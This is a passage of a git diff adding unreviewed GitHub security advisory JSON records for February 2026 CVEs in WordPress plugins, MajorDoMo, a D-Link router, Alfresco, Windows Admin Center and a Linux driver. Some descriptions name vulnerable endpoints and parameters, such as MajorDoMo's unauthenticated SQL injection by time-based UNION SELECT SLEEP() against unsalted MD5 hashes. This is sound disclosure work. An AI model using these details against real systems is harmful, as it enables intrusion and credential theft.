functionality. This is due to insufficient validation of user-supplied file paths, allowing directory traversal sequences. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can lead to remote code execution when critical files like wp-config.php are deleted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2426" + }, + { + "type": "WEB", + "url": "https://github.com/lesterchan/wp-downloadmanager/commit/d3470a8971d9043438c8aad281cf37d14fefa208" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/tags/1.69/download-manager.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/trunk/download-manager.php#L215" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3f791dd-7c24-45e3-b4f6-b8d7e594c568?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json b/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json new file mode 100644 index 0000000000000..d0fa6dd3ed933 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w35p-gjc5-2g6r", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-2230" + ], + "details": "The Booking Calendar plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 10.14.14 via the handle_ajax_save function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, and booking permissions granted by an Administrator, to modify other users' plugin settings, such as booking calendar display options, which can disrupt the booking calendar functionality for the targeted user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2230" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/booking/trunk/includes/save-user-meta/save-user-meta.php#L90" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3456856" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60f7df44-22f9-4a9e-a20c-4b8628674079?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w366-h875-fm53/GHSA-w366-h875-fm53.json b/advisories/unreviewed/2026/02/GHSA-w366-h875-fm53/GHSA-w366-h875-fm53.json new file mode 100644 index 0000000000000..d2a2dd446e416 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w366-h875-fm53/GHSA-w366-h875-fm53.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w366-h875-fm53", + "modified": "2026-02-19T00:30:30Z", + "published": "2026-02-19T00:30:30Z", + "aliases": [ + "CVE-2026-27179" + ], + "details": "MajorDoMo (aka Major Domestic Module) contains an unauthenticated SQL injection vulnerability in the commands module. The commands_search.inc.php file directly interpolates the $_GET['parent'] parameter into multiple SQL queries without sanitization or parameterized queries. The commands module is loadable without authentication via the /objects/?module=commands endpoint, which includes arbitrary modules by name and calls their usual() method. Time-based blind SQL injection is exploitable using UNION SELECT SLEEP() syntax. Because MajorDoMo stores admin passwords as unsalted MD5 hashes in the users table, successful exploitation enables extraction of credentials and subsequent admin panel access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27179" + }, + { + "type": "WEB", + "url": "https://github.com/sergejey/majordomo/pull/1177" + }, + { + "type": "WEB", + "url": "https://chocapikk.com/posts/2026/majordomo-revisited" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/majordomo-unauthenticated-sql-injection-in-commands-module" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w3jh-c422-596p/GHSA-w3jh-c422-596p.json b/advisories/unreviewed/2026/02/GHSA-w3jh-c422-596p/GHSA-w3jh-c422-596p.json new file mode 100644 index 0000000000000..e754d7a7fa5e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w3jh-c422-596p/GHSA-w3jh-c422-596p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w3jh-c422-596p", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-12821" + ], + "details": "The NewsBlogger theme for WordPress is vulnerable to Cross-Site Request Forgery in versions 0.2.5.6 to 0.2.6.1. This is due to missing or incorrect nonce validation on the newsblogger_install_and_activate_plugin() function. This makes it possible for unauthenticated attackers to upload arbitrary files and achieve remote code execution via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This is due to a reverted fix of CVE-2025-1305.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12821" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/browser/newsblogger/0.2.5.8/functions.php#L499" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9f33096a-dfd5-48c1-84d8-30a0faa2a7f5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json b/advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json new file mode 100644 index 0000000000000..74e42168b7dba --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4gp-396m-45pm", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2884" + ], + "details": "A vulnerability was identified in D-Link DWR-M960 1.01.07. The affected element is the function sub_41914C of the file /boafrm/formWanConfigSetup of the component WAN Interface Setting Handler. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2884" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/18" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347178" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347178" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754493" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T21:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json b/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json new file mode 100644 index 0000000000000..0f9646a7052d4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4rx-r6r4-5c2v", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27317" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27317" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json b/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json new file mode 100644 index 0000000000000..f6d73b0c01487 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4wv-h996-6v9c", + "modified": "2026-02-20T12:31:25Z", + "published": "2026-02-20T12:31:25Z", + "aliases": [ + "CVE-2026-2486" + ], + "details": "The Master Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ma_el_bh_table_btn_text' parameter in versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2486" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3461745/master-addons/tags/2.1.2/addons/ma-business-hours/ma-business-hours.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a78c2621-afff-40b4-ae45-831b2b847756?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T12:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w5xc-rm8g-jf7m/GHSA-w5xc-rm8g-jf7m.json b/advisories/unreviewed/2026/02/GHSA-w5xc-rm8g-jf7m/GHSA-w5xc-rm8g-jf7m.json new file mode 100644 index 0000000000000..fefbd0aca2b05 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w5xc-rm8g-jf7m/GHSA-w5xc-rm8g-jf7m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5xc-rm8g-jf7m", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-26119" + ], + "details": "Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26119" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26119" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T23:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w64w-h2r9-c284/GHSA-w64w-h2r9-c284.json b/advisories/unreviewed/2026/02/GHSA-w64w-h2r9-c284/GHSA-w64w-h2r9-c284.json new file mode 100644 index 0000000000000..0e93d4d7f44ff --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w64w-h2r9-c284/GHSA-w64w-h2r9-c284.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w64w-h2r9-c284", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-12448" + ], + "details": "The Smartsupp – live chat, AI shopping assistant and chatbots plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'code' parameter in all versions up to, and including, 3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12448" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/smartsupp-live-chat/tags/3.2/admin/class-smartsupp-admin.php#L105" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/smartsupp-live-chat/tags/3.2/public/class-smartsupp.php#L177" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398777%40smartsupp-live-chat&new=3398777%40smartsupp-live-chat&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402922%40smartsupp-live-chat&new=3402922%40smartsupp-live-chat&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403904%40smartsupp-live-chat&new=3403904%40smartsupp-live-chat&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c298653-7f79-4ee2-89c8-8a6d0e1446b8?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json b/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json index fb983741d1b02..642990f28e6a5 100644 --- a/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json +++ b/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-94" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json b/advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json new file mode 100644 index 0000000000000..250d866e35528 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7wm-w9qw-pc72", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25459" + ], + "details": "Web Ofisi Emlak V2 contains multiple SQL injection vulnerabilities in the endpoint that allow unauthenticated attackers to manipulate database queries through GET parameters. Attackers can inject SQL code into parameters like emlak_durumu, emlak_tipi, il, ilce, kelime, and semt to extract sensitive database information or perform time-based blind SQL injection attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25459" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47142" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-emlak-sql-injection-via-emlak-arahtml" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/emlak-scripti-v3.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json b/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json new file mode 100644 index 0000000000000..a2c559792d9ce --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7wv-fvvq-ppfp", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68852" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webmuehle Court Reservation court-reservation allows Reflected XSS.This issue affects Court Reservation: from n/a through <= 1.10.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68852" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/court-reservation/vulnerability/wordpress-court-reservation-manage-your-court-bookings-online-plugin-1-10-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json b/advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json new file mode 100644 index 0000000000000..77b64472fd814 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8g9-9cxr-c95j", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-27533" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27533" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json b/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json new file mode 100644 index 0000000000000..2727785fe1b40 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8hp-9h4v-r2fg", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27322" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27322" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json b/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json new file mode 100644 index 0000000000000..d7d96e2f567ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8hr-79rx-368j", + "modified": "2026-02-20T15:31:00Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-26339" + ], + "details": "Hyland Alfresco Transformation Service allows unauthenticated attackers to achieve remote code execution through the argument injection vulnerability, which exists in the document processing functionality.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26339" + }, + { + "type": "WEB", + "url": "https://connect.hyland.com/t5/alfresco-blog/security-update-cve-2026-26337-cve-2026-26338-cve-2026-26339/ba-p/496551" + }, + { + "type": "WEB", + "url": "https://www.hyland.com/en/solutions/products/alfresco-platform" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/hyland-alfresco-transformation-service-argument-injection-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:25:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json new file mode 100644 index 0000000000000..940a4d6d2b01d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w94g-pmcx-r454", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-71229" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: Fix alignment fault in rtw_core_enable_beacon()\n\nrtw_core_enable_beacon() reads 4 bytes from an address that is not a\nmultiple of 4. This results in a crash on some systems.\n\nDo 1 byte reads/writes instead.\n\nUnable to handle kernel paging request at virtual address ffff8000827e0522\nMem abort info:\n ESR = 0x0000000096000021\n EC = 0x25: DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n FSC = 0x21: alignment fault\nData abort info:\n ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\nswapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000005492000\n[ffff8000827e0522] pgd=0000000000000000, p4d=10000001021d9403, pud=10000001021da403, pmd=100000011061c403, pte=00780000f3200f13\nInternal error: Oops: 0000000096000021 [#1] SMP\nModules linked in: [...] rtw88_8822ce rtw88_8822c rtw88_pci rtw88_core [...]\nCPU: 0 UID: 0 PID: 73 Comm: kworker/u32:2 Tainted: G W 6.17.9 #1-NixOS VOLUNTARY\nTainted: [W]=WARN\nHardware name: FriendlyElec NanoPC-T6 LTS (DT)\nWorkqueue: phy0 rtw_c2h_work [rtw88_core]\npstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : rtw_pci_read32+0x18/0x40 [rtw88_pci]\nlr : rtw_core_enable_beacon+0xe0/0x148 [rtw88_core]\nsp : ffff800080cc3ca0\nx29: ffff800080cc3ca0 x28: ffff0001031fc240 x27: ffff000102100828\nx26: ffffd2cb7c9b4088 x25: ffff0001031fc2c0 x24: ffff000112fdef00\nx23: ffff000112fdef18 x22: ffff000111c29970 x21: 0000000000000001\nx20: 0000000000000001 x19: ffff000111c22040 x18: 0000000000000000\nx17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\nx14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : ffffd2cb6507c090\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000\nx5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000\nx2 : 0000000000007f10 x1 : 0000000000000522 x0 : ffff8000827e0522\nCall trace:\n rtw_pci_read32+0x18/0x40 [rtw88_pci] (P)\n rtw_hw_scan_chan_switch+0x124/0x1a8 [rtw88_core]\n rtw_fw_c2h_cmd_handle+0x254/0x290 [rtw88_core]\n rtw_c2h_work+0x50/0x98 [rtw88_core]\n process_one_work+0x178/0x3f8\n worker_thread+0x208/0x418\n kthread+0x120/0x220\n ret_from_fork+0x10/0x20\nCode: d28fe202 8b020000 f9524400 8b214000 (b9400000)\n---[ end trace 0000000000000000 ]---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71229" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/13394550441557115bb74f6de9778c165755a7ab" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/653f8b6a091538b084715f259900f62c2ec1c6cf" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/71dee092903adb496fe1f357b267d94087b679e0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7d31dde1bd8678115329e46dc8d7afb63c176b74" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json b/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json new file mode 100644 index 0000000000000..187b30ffa115c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9fg-2h32-5478", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-2435" + ], + "details": "Tanium addressed a SQL injection vulnerability in Asset.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2435" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json 